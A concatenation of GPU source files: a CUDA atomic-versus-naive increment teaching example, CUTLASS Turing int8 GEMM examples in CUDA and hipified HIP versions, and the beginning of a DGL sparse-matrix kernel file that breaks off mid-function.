#include <stdio.h> #include "gputimer.h" #define NUM_THREADS 10000000 #define ARRAY_SIZE 100 #define BLOCK_WIDTH 1000 void print_array(int *array, int size) { printf("{ "); for (int i = 0; i < size; i++) { printf("%d ", array[i]); } printf("}\n"); } __global__ void increment_naive(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; g[i] = g[i] + 1; } __global__ void increment_atomic(int *g) { // which thread is this? int i = blockIdx.x * blockDim.x + threadIdx.x; // each thread to increment consecutive elements, wrapping at ARRAY_SIZE i = i % ARRAY_SIZE; atomicAdd(& g[i], 1); } int main(int argc,char **argv) { GpuTimer timer; printf("%d total threads in %d blocks writing into %d array elements\n", NUM_THREADS, NUM_THREADS / BLOCK_WIDTH, ARRAY_SIZE); // declare and allocate host memory int h_array[ARRAY_SIZE]; const int ARRAY_BYTES = ARRAY_SIZE * sizeof(int); // declare, allocate, and zero out GPU memory int * d_array; cudaMalloc((void **) &d_array, ARRAY_BYTES); cudaMemset((void *) d_array, 0, ARRAY_BYTES); // launch the kernel - comment out one of these timer.Start(); // Instructions: This program is needed for the next quiz // uncomment increment_naive to measure speed and accuracy // of non-atomic increments or uncomment increment_atomic to // measure speed and accuracy of atomic icrements // increment_naive<<<NUM_THREADS/BLOCK_WIDTH, BLOCK_WIDTH>>>(d_array); increment_atomic<<<NUM_THREADS/BLOCK_WIDTH, BLOCK_WIDTH>>>(d_array); timer.Stop(); // copy back the array of sums from GPU and print cudaMemcpy(h_array, d_array, ARRAY_BYTES, cudaMemcpyDeviceToHost); print_array(h_array, ARRAY_SIZE); printf("Time elapsed = %g ms\n", timer.Elapsed()); // free GPU memory allocation and exit cudaFree(d_array); return 0; }
40d62aa757359add2ad6e1bb4d8638e631df0be3.hip
// !!! This is a file automatically generated by hipify!!! /*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions (knobs) to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { hipDeviceProp_t props; CUDA_CHECK(hipGetDeviceProperties(&props, 0)); if (!(props.major >= 7 && props.minor >= 5)) { std::cerr << "Turing Tensor Ops must be run on a machine with compute capability at least 75." << std::endl; return 0; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // Create a tuple of gemm kernel arguments. This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish hipDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
40d62aa757359add2ad6e1bb4d8638e631df0be3.cu
/*************************************************************************************************** * Copyright (c) 2017-2019, NVIDIA CORPORATION. All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, are permitted * provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this list of * conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, this list of * conditions and the following disclaimer in the documentation and/or other materials * provided with the distribution. * * Neither the name of the NVIDIA CORPORATION nor the names of its contributors may be used * to endorse or promote products derived from this software without specific prior written * permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND * FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TOR (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * **************************************************************************************************/ /** This example shows how to run matrix multiplication kernels using functions and data structures provided by CUTLASS using tensor cores; which we run on a NVIDIA Turing GPU. Writing a single high performance matrix multiplication kernel is hard but do-able. Whereas writing high performance kernels at scale which works for multiple problem sizes with good abstractions is really hard. CUTLASS solves this problem by providing simplified abstractions (knobs) to compose multiple sections of gemm kernel. When used properly, the kernels can hit peak performance of GPU easily. CUTLASS divides a kernel into hierarchical composable sections. Which means, at each thread, warp and thread-block level, they compute on their own tile-size with higher level of tile sizes being composed from lower level ones. Multiple thread-tiles (tile size each thread computes) can be used to form warp-tiles (tile size each warp computes) and multiple warp tiles can be used to compute threadblock-tile (tile size computed by a threadblock). In thie example, we split variable initialization into 1. Setting up data properties : describes how matrices are laid out in the memory and how the kernel can view them (logical to physical mapping) 2. Setting up computation properties : describes how the above set matrices will be used to compute output of matrix multiplication. First, we setup the data types of matrices A, B, C and D along with alpha, beta as the equation for GEMM is D = alpha * A * B + beta * C. In CUTLASS, the kernels first compute A * B and leaves the rest of the computation to end of the kernel as alpha * X + beta * C is a simple element-wise operation on X (A * B) and C. We call this as epilogue of kernel. Hence, we setup data types for alpha and beta to be equal to ElementComputeEpilogue = int32_t. As we want to use MMA instructions on Turing and they support 8-bit signed integer (int8_t), we use data type for elements in input matrix A and B as int8_t. Volta also supports accumulation of partial dot product to int32_t, which can store wider range of numbers, we use it as data type of output matrix elements and accumulation. We convey this to CUTLASS kernel by initializing template variables ElementAccumulator (int32_t), ElementComputeEpilogue (int32_t), ElementInputA (int8_t), ElementInputB (int8_t), ElementOutput (int32_t). Communicating just the data type is not enough. As the data is laid out linearly in memory, we have to convey the layout of matrices. We do that by initializing template variable LayoutInputA to column major cutlass variable, LayoutInputB to row major and LayoutOutput to row major. Next, we setup rules to comptue alpha * X + beta * C which is called epilogue of the kernel. We initialize template variable EpilogueOp, which takes the data type of output ElementOutput (int32_t), the number of elements per vector memory access (16), data type of accumulator (int32_t) and data type of computation of linear combination (alpha * X + beta * C). Now that we setup the properties of data, we have to setup properties of computation. Second, we create template variables of tile sizes for thread-block, warp and mma-op to 128x256x64, 64x64x16, 8x8x16 (MxNxK) respectively. When passed to instantiate CUTLASS GEMM kernel, it internally deduce the amount of threads needed per thread-block, amount of shared memory, storing data in bank-conflict free manner, and ton of other variables required to compose, intialize and launch a high performance GEMM kernel. This is the beauty of CUTLASS, it relieves developer from understanding and coding complicated hardware optimizations which can easily go wrong. CUTLASS also supports multiple MMA pipelines in a threadblock. What are MMA pipelines? MMA pipelines constitute the whole process of loading input data from global memory to shared memory, loading data from shared memory to registers, doing matrix multiplication, store to global memory. The below flow sequence shows a typical mma pipeline. matrix in global memory -> registers -> tile in shared memory -> registers -> mma -> registers -> output to global memory The problem with single pipeline is, each stage is synchronous which means, each stage has to wait until the previous finished executing. There are stages in the pipeline which do not have fixed latency, for example, the loads from global memory and shared memory. Therefore, we can add one more pipeline with a phase shift in mma kernel to hide latency from global and shared memory loads. Finally, the pipeline in a kernel looks like (1) matrix in global memory -> (2) registers -> (3) tile in shared memory -> (4) registers -> (5) mma -> (6) registers -> (7) output to global memory (1) <null> -> (2) <null> -> (3) matrix in global memory -> (4) registers -> (5) tile in shared memory -> (6) registers -> (7) mma -> (8) registers -> (9) output to global memory This way, you can hide the second global memoroy load latency by doing computation on already loaded input data. There are few more template variables initialized such as, which threadblock tile of output matrix is done which threadblock launched on an SM, CUDA SM architecture of GPU you want to run on. These are all put together to create a template variable which describes CUTLASS GEMM kernel using cutlass::gemm::device::Gemm template. The next step is to intialize physical data, instantiate and initialize CUTLASS kernel and run it. We use CUTLASS utilities to initialize, fill, compare matrices as they are simple and doesn't come in the way of learning CUTLASS. Once all the matrices are initialized and filled with data, create arguments tuple to launch CUTLASS kernel which takes problem size (M = 5120, N = 4096 and K = 4096), matrices, alpha, beta and the important one, split k-dimension factor. Along with that, we query CUTLASS if any scratch-space memory required by the kernel we instantiated. If yes, we create it and pass it along with other arguments created to intialize CUTLASS kernel then, the kernel is launched. In this example, we later on launch a reference gemm kernel (from CUTLASS utilities) to compare if the output from CUTLASS kernel is same as reference GEMM kernel. */ #include <iostream> #include "cutlass/cutlass.h" #include "cutlass/gemm/device/gemm.h" #include "cutlass/util/host_tensor.h" #include "cutlass/util/reference/device/gemm.h" #include "cutlass/util/reference/host/tensor_compare.h" #include "cutlass/util/reference/host/tensor_copy.h" #include "cutlass/util/reference/host/tensor_fill.h" #include "cutlass/util/tensor_view_io.h" #include "helper.h" // The code section below describes datatype for input, output matrices and computation between // elements in input matrices. using ElementAccumulator = int32_t; // <- data type of accumulator using ElementComputeEpilogue = ElementAccumulator; // <- data type of epilogue operations using ElementInputA = int8_t; // <- data type of elements in input matrix A using ElementInputB = int8_t; // <- data type of elements in input matrix B using ElementOutput = int32_t; // <- data type of elements in output matrix D // The code section below describes matrix layout of input and output matrices. Column Major for // Matrix A, Row Major for Matrix B and Row Major for Matrix C using LayoutInputA = cutlass::layout::RowMajor; using LayoutInputB = cutlass::layout::ColumnMajor; using LayoutOutput = cutlass::layout::RowMajor; // This code section describes whether you want to use tensor cores or regular SIMT cores on GPU SM using MMAOp = cutlass::arch::OpClassTensorOp; // This code section describes CUDA SM architecture number using SmArch = cutlass::arch::Sm75; // This code section describes the tile size a thread block will compute using ShapeMMAThreadBlock = cutlass::gemm::GemmShape<128, 256, 64>; // <- threadblock tile M = 128, N = 256, K = 64 // This code section describes tile size a warp will compute using ShapeMMAWarp = cutlass::gemm::GemmShape<64, 64, 64>; // <- warp tile M = 64, N = 64, K = 16 // This code section describes the size of MMA op using ShapeMMAOp = cutlass::gemm::GemmShape<8, 8, 16>; // <- MMA Op tile M = 8, N = 8, K = 16 // This code section describes how threadblocks are scheduled on GPU using SwizzleThreadBlock = cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle; // <- ?? // This code section describes the epilogue part of the kernel using EpilogueOp = cutlass::epilogue::thread::LinearCombination< ElementOutput, // <- data type of output matrix 128 / cutlass::sizeof_bits<ElementOutput>::value, // <- the number of elements per vectorized // memory access. For a byte, it's 16 // elements. This becomes the vector width of // math instructions in the epilogue too ElementAccumulator, // <- data type of accumulator ElementComputeEpilogue>; // <- data type for alpha/beta in linear combination function // Number of pipelines you want to use constexpr int NumStages = 2; using Gemm = cutlass::gemm::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementAccumulator, MMAOp, SmArch, ShapeMMAThreadBlock, ShapeMMAWarp, ShapeMMAOp, EpilogueOp, SwizzleThreadBlock, NumStages>; int main() { cudaDeviceProp props; CUDA_CHECK(cudaGetDeviceProperties(&props, 0)); if (!(props.major >= 7 && props.minor >= 5)) { std::cerr << "Turing Tensor Ops must be run on a machine with compute capability at least 75." << std::endl; return 0; } const int length_m = 5120; const int length_n = 4096; const int length_k = 4096; // Create a tuple of problem size for matrix multiplication cutlass::gemm::GemmCoord problem_size(length_m, length_n, length_k); // Initialize tensors using CUTLASS helper functions cutlass::HostTensor<ElementInputA, LayoutInputA> tensor_a( problem_size.mk()); // <- Create matrix A with dimensions M x K cutlass::HostTensor<ElementInputB, LayoutInputB> tensor_b( problem_size.nk()); // <- Create matrix B with dimensions N x K cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_c( problem_size.mn()); // <- Create matrix C with dimensions M x N cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // CUTLASS kernel cutlass::HostTensor<ElementOutput, LayoutOutput> tensor_ref_d( problem_size.mn()); // <- Create matrix D with dimensions M x N used to store output from // reference kernel // Fill input and output matrices on host using CUTLASS helper functions cutlass::reference::host::TensorFillRandomUniform( tensor_a.host_view(), 1, ElementInputA(4), ElementInputA(-4), 0); // <- Fill matrix A on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_b.host_view(), 1, ElementInputB(4), ElementInputB(-4), 0); // <- Fill matrix B on host with uniform-distribution random data cutlass::reference::host::TensorFillRandomUniform( tensor_c.host_view(), 1, ElementOutput(4), ElementOutput(-4), 0); // <- Fill matrix C on host with uniform-distribution random data cutlass::reference::host::TensorFill( tensor_d.host_view()); // <- fill matrix D on host with zeros cutlass::reference::host::TensorFill( tensor_ref_d.host_view()); // <- fill matrix D for reference on host with zeros // Copy data from host to GPU tensor_a.sync_device(); tensor_b.sync_device(); tensor_c.sync_device(); tensor_d.sync_device(); tensor_ref_d.sync_device(); // Initialize alpha and beta for dot product computation ElementComputeEpilogue alpha = ElementComputeEpilogue(1); ElementComputeEpilogue beta = ElementComputeEpilogue(0); // Split K dimension into 1 partitions int split_k_slices = 1; // Create a tuple of gemm kernel arguments. This is later passed as arguments to launch // instantiated CUTLASS kernel typename Gemm::Arguments arguments{problem_size, // <- problem size of matrix multiplication tensor_a.device_ref(), // <- reference to matrix A on device tensor_b.device_ref(), // <- reference to matrix B on device tensor_c.device_ref(), // <- reference to matrix C on device tensor_d.device_ref(), // <- reference to matrix D on device {alpha, beta}, // <- tuple of alpha and beta split_k_slices}; // <- k-dimension split factor // Using the arguments, query for extra workspace required for matrix multiplication computation size_t workspace_size = Gemm::get_workspace_size(arguments); // Allocate workspace memory cutlass::device_memory::allocation<uint8_t> workspace(workspace_size); // Instantiate CUTLASS kernel depending on templates Gemm gemm_op; // Initialize CUTLASS kernel with arguments and workspace pointer cutlass::Status status = gemm_op.initialize(arguments, workspace.get()); CUTLASS_CHECK(status); // Launch initialized CUTLASS kernel status = gemm_op(); CUTLASS_CHECK(status); // Create instantiation for device reference gemm kernel cutlass::reference::device::Gemm<ElementInputA, LayoutInputA, ElementInputB, LayoutInputB, ElementOutput, LayoutOutput, ElementComputeEpilogue, ElementComputeEpilogue> gemm_device; // Launch device reference gemm kernel gemm_device(problem_size, alpha, tensor_a.device_ref(), tensor_b.device_ref(), beta, tensor_c.device_ref(), tensor_ref_d.device_ref()); // Wait for kernels to finish cudaDeviceSynchronize(); // Copy output data from CUTLASS and reference kernel to host for comparison tensor_d.sync_host(); tensor_ref_d.sync_host(); // Check if output from CUTLASS kernel and reference kernel are equal or not std::cout << (cutlass::reference::host::TensorEquals(tensor_d.host_view(), tensor_ref_d.host_view()) ? "Passed" : "Failed") << std::endl; CUTLASS_CHECK(status); return 0; }
4506e4f74fa4cb5cf8fe511f46ecbeca71df0411.hip
// !!! This is a file automatically generated by hipify!!! /*! * Copyright (c) 2019 by Contributors * \file kernel/cuda/binary_reduce_sum.cu * \brief CUDA kernels for binary reduce sum */ #include <dgl/runtime/device_api.h> #include "../../runtime/cuda/cuda_common.h" #include "binary_reduce_impl_hip.cuh" #include "./backward_binary_reduce_impl.cuh" #include "../utils.h" #include "../csr_interface.h" using minigun::advance::RuntimeConfig; using Csr = minigun::Csr<int32_t>; namespace dgl { namespace kernel { namespace cuda { // specialization for cusparse template <typename DType> hipsparseStatus_t Xcsrmm2(hipsparseHandle_t handle, hipsparseOperation_t transA, hipsparseOperation_t transB, int m, int n, int k, int nnz, const DType* alpha, const hipsparseMatDescr_t descrA, const DType* csrValA, const int* csrRowPtrA, const int* csrColIndA, const DType* B, int ldb, const DType* beta, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return HIPSPARSE_STATUS_EXECUTION_FAILED; } template <> hipsparseStatus_t Xcsrmm2<float>(hipsparseHandle_t handle, hipsparseOperation_t transA, hipsparseOperation_t transB, int m, int n, int k, int nnz, const float* alpha, const hipsparseMatDescr_t descrA, const float* csrValA, const int* csrRowPtrA, const int* csrColIndA, const float* B, int ldb, const float* beta, float* C, int ldc) { return hipsparseScsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <> hipsparseStatus_t Xcsrmm2<double>(hipsparseHandle_t handle, hipsparseOperation_t transA, hipsparseOperation_t transB, int m, int n, int k, int nnz, const double* alpha, const hipsparseMatDescr_t descrA, const double* csrValA, const int* csrRowPtrA, const int* csrColIndA, const double* B, int ldb, const double* beta, double* C, int ldc) { return hipsparseDcsrmm2(handle, transA, transB, m, n, k, nnz, alpha, descrA, csrValA, csrRowPtrA, csrColIndA, B, ldb, beta, C, ldc); } template <typename DType> hipblasStatus_t Xgeam(hipblasHandle_t handle, hipblasOperation_t transa, hipblasOperation_t transb, int m, int n, const DType* alpha, const DType* A, int lda, const DType* beta, const DType* B, int ldb, DType* C, int ldc) { LOG(INFO) << "Not supported dtype"; return HIPBLAS_STATUS_EXECUTION_FAILED; } template <> hipblasStatus_t Xgeam<float>(hipblasHandle_t handle, hipblasOperation_t transa, hipblasOperation_t transb, int m, int n, const float* alpha, const float* A, int lda, const float* beta, const float* B, int ldb, float* C, int ldc) { return hipblasSgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <> hipblasStatus_t Xgeam<double>(hipblasHandle_t handle, hipblasOperation_t transa, hipblasOperation_t transb, int m, int n, const double* alpha, const double* A, int lda, const double* beta, const double* B, int ldb, double* C, int ldc) { return hipblasDgeam(handle, transa, transb, m, n, alpha, A, lda, beta, B, ldb, C, ldc); } template <typename DType> void CusparseCsrmm2( const RuntimeConfig& rtcfg, const Csr& csr, const DType* B_data, DType* C_data, int out_size, int x_length) { // We use csrmm2 to perform following operation: // C = A x B, where A is a sparse matrix in csr format, B is the dense matrix for node // feature tensor. However, since cusparse only supports column-major, while our tensor // is stored in row-major, the actual computation is: // C = trans(A x trans(B)). // Currently, we use cublasXgeam to implement transposition and allocate intermediate // workspace memory for this. // TODO(minjie): The given CSR could potentially represent a bipartite graph (e.g. in the // case of nodeflow). Currently, we don't have bipartite graph support. Here is a small // hack. In the python side, we create a CSR that includes both the source and destination // nodes in the bipartite graph (so it is still square matrix). Here, when multiplying // this sparse matrix, we specify the number of rows (the `m` here) to be equal to the // number of rows of the output tensor (i.e, the `out_size`). // In the future, we should make sure the number of rows of the given csr is equal // to out_size (a.k.a the given csr is a rectangle matrix). const int m = out_size; const int k = csr.row_offsets.length - 1; const int n = x_length; const int nnz = csr.column_indices.length; const DType alpha = 1.0; const DType beta = 0.0; // device auto device = runtime::DeviceAPI::Get(rtcfg.ctx); auto* thr_entry = runtime::CUDAThreadEntry::ThreadLocal(); // allocate cusparse handle if needed if (!thr_entry->cusparse_handle) { CUSPARSE_CALL(hipsparseCreate(&(thr_entry->cusparse_handle))); } 